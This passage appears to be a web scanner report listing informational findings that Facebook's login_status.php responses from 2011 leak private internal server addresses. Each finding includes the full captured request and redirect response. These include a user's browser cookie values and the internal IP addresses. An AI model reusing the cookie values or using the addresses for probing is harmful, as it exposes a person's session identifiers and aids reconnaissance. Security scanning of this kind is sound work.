http%253A%252F%252Faol.sportingnews.com%252Ff311f4ad5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11aab8794&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df378f0dfa8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff311f4ad5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11aab8794&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f355898d4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff311f4ad5&relation=parent&transport=postmessage&frame=f11aab8794
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.137.126
X-Cnection: close
Date: Thu, 05 May 2011 01:12:37 GMT
Content-Length: 0

20.86. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.100.122

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20b8bea68%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff9917dca4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df233ce1c08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff9917dca4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ef4c6c58%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33c86890%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff9917dca4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ef4c6c58&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b9f10734%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff9917dca4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ef4c6c58&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16cfdba8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff9917dca4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ef4c6c58&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3b9f10734&origin=http%3A%2F%2Faol.sportingnews.com%2Ff9917dca4&relation=parent&transport=postmessage&frame=f2ef4c6c58
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.100.122
X-Cnection: close
Date: Thu, 05 May 2011 02:04:00 GMT
Content-Length: 0

20.87. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.136.132

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11f07c834%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b85da034%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d6bb38c4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b85da034%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df85d88918%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df15e020e24%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b85da034%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df85d88918&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d9837ddc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b85da034%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df85d88918&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dffaef470c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b85da034%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df85d88918&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3d9837ddc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1b85da034&relation=parent&transport=postmessage&frame=f85d88918
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.136.132
X-Cnection: close
Date: Thu, 05 May 2011 02:16:38 GMT
Content-Length: 0

20.88. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.210.65

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3da1a035c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff257a12eac%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2de7dba74%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff257a12eac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff50c8b3%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df942f6194%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff257a12eac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff50c8b3&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df210482be%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff257a12eac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff50c8b3&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1811cb138%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff257a12eac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff50c8b3&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f210482be&origin=http%3A%2F%2Faol.sportingnews.com%2Ff257a12eac&relation=parent&transport=postmessage&frame=ff50c8b3
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.210.65
X-Cnection: close
Date: Thu, 05 May 2011 01:58:25 GMT
Content-Length: 0

20.89. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.167.61

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df36784567c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36e8a4c3%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2efbed5ec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36e8a4c3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30638ba1%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2fc8d941%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36e8a4c3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30638ba1&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20a29bdf%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36e8a4c3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30638ba1&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df259b2f898%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36e8a4c3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30638ba1&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f20a29bdf&origin=http%3A%2F%2Faol.sportingnews.com%2Ff36e8a4c3&relation=parent&transport=postmessage&frame=f30638ba1
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.167.61
X-Cnection: close
Date: Thu, 05 May 2011 01:23:41 GMT
Content-Length: 0

20.90. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.108.102

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df339156848%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3af2f9734%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24fc8a95%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3af2f9734%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc79c2bcc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b30b2c98%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3af2f9734%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc79c2bcc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df15ee219cc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3af2f9734%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc79c2bcc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df183cdc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3af2f9734%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc79c2bcc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f15ee219cc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3af2f9734&relation=parent&transport=postmessage&frame=fc79c2bcc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.108.102
X-Cnection: close
Date: Thu, 05 May 2011 01:09:52 GMT
Content-Length: 0

20.91. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.139.120

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23490dec8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3306696ec%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df204dba704%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3306696ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35a02d11%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1b6855fe4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3306696ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35a02d11&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df265a7%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3306696ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35a02d11&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df14625b68c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3306696ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35a02d11&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f265a7&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3306696ec&relation=parent&transport=postmessage&frame=f35a02d11
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.139.120
X-Cnection: close
Date: Thu, 05 May 2011 02:19:13 GMT
Content-Length: 0

20.92. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.138.102

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3950f37b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36499466%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2945e9c68%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36499466%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d8e44b68%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df21f7ec568%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36499466%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d8e44b68&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d570b96c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36499466%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d8e44b68&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1bd87fbb8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36499466%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d8e44b68&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2d570b96c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff36499466&relation=parent&transport=postmessage&frame=f3d8e44b68
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.138.102
X-Cnection: close
Date: Thu, 05 May 2011 01:59:45 GMT
Content-Length: 0

20.93. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.96.77

Request

GET /extern/login_status.php?api_key=47c6f1cfdf79ef9c669f1beb89b3e598&app_id=47c6f1cfdf79ef9c669f1beb89b3e598&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df4b99ee0%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfe25b524c%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11f5dcd84%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df27fcb7b5c%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11f5dcd84&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df38b20c288%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11f5dcd84&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37906661%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11f5dcd84&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.truveo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f38b20c288&origin=http%3A%2F%2Fwww.truveo.com%2Ff192839764&relation=parent&transport=postmessage&frame=f11f5dcd84
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.96.77
X-Cnection: close
Date: Thu, 05 May 2011 00:57:34 GMT
Content-Length: 0

20.94. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.72.51

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1023a5e3c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1bc0499%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfb7ae2db8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1bc0499%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df153d75394%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b19ccb94%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1bc0499%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df153d75394&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df358ac1c84%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1bc0499%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df153d75394&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a38fa2c8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1bc0499%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df153d75394&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
